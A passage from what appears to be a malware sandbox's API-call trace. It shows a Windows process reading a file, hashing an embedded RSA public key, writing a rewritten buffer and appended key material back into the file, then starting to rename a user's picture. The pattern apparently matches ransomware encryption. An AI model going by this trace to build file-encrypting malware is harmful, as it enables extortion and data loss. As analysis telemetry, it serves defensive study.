| out: lpFileSize=0x30ffb40*=98282) returned 1 [0187.520] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0187.523] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17fc4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.523] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0187.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.534] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.534] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x17fea, lpOverlapped=0x0) returned 1 [0187.535] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0187.535] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.535] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.535] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0187.537] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0187.537] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0187.537] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0187.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0187.537] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0187.537] GetLastError () returned 0x0 [0187.537] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0187.537] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0187.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0187.538] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0187.538] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0187.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.538] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0187.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x17ff0) returned 0x2d43778 [0187.539] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0187.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0187.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0187.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0187.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38cb8 [0187.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396d0 [0187.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d00 [0187.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39718 [0187.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39778 [0187.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397d8 [0187.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39790 [0187.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0187.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0187.540] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0187.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0187.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39778 | out: hHeap=0x6a0000) returned 1 [0187.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39790 | out: hHeap=0x6a0000) returned 1 [0187.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397d8 | out: hHeap=0x6a0000) returned 1 [0187.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0187.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397d8 [0187.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0187.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39790 [0187.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0187.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39778 [0187.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0187.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0187.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0187.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0187.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0187.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0187.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39790 | out: hHeap=0x6a0000) returned 1 [0187.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39778 | out: hHeap=0x6a0000) returned 1 [0187.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397d8 | out: hHeap=0x6a0000) returned 1 [0187.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0187.543] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0187.543] GetCurrentThreadId () returned 0x264 [0187.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0187.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d37d98 [0187.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0187.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0187.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0187.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0187.543] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.544] GetCurrentThreadId () returned 0x264 [0187.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0187.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0187.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0187.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0187.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397d8 [0187.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0187.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0187.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0187.545] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39778 [0187.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0187.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0187.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0187.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0187.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39790 [0187.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0187.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0187.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0187.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39760 [0187.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0187.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397f0 [0187.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0187.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397c0 [0187.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.547] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397a8 [0187.547] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39808 [0187.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397a8 | out: hHeap=0x6a0000) returned 1 [0187.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397a8 [0187.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397c0 | out: hHeap=0x6a0000) returned 1 [0187.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0187.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0187.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0187.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39778 | out: hHeap=0x6a0000) returned 1 [0187.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39778 [0187.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0187.548] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397d8 | out: hHeap=0x6a0000) returned 1 [0187.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0187.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39808 | out: hHeap=0x6a0000) returned 1 [0187.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0187.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0187.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0187.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39778 | out: hHeap=0x6a0000) returned 1 [0187.549] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0187.549] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0187.550] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0187.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0187.550] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0187.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0187.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0187.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.551] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0187.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0187.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397a8 | out: hHeap=0x6a0000) returned 1 [0187.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397f0 | out: hHeap=0x6a0000) returned 1 [0187.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39790 | out: hHeap=0x6a0000) returned 1 [0187.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39760 | out: hHeap=0x6a0000) returned 1 [0187.552] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0187.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0187.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0187.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39718 | out: hHeap=0x6a0000) returned 1 [0187.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d00 | out: hHeap=0x6a0000) returned 1 [0187.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0187.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0187.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0187.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0187.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0187.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0187.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0187.556] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x17fe5, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x17fe5, lpOverlapped=0x0) returned 1 [0187.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0187.557] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17fea, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.557] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0187.558] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0187.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0187.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.559] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0187.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0187.559] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.559] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0187.559] CloseHandle (hObject=0x584) returned 1 [0187.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d42908 [0187.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.562] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\NThXrLNnKw.gif" (normalized: 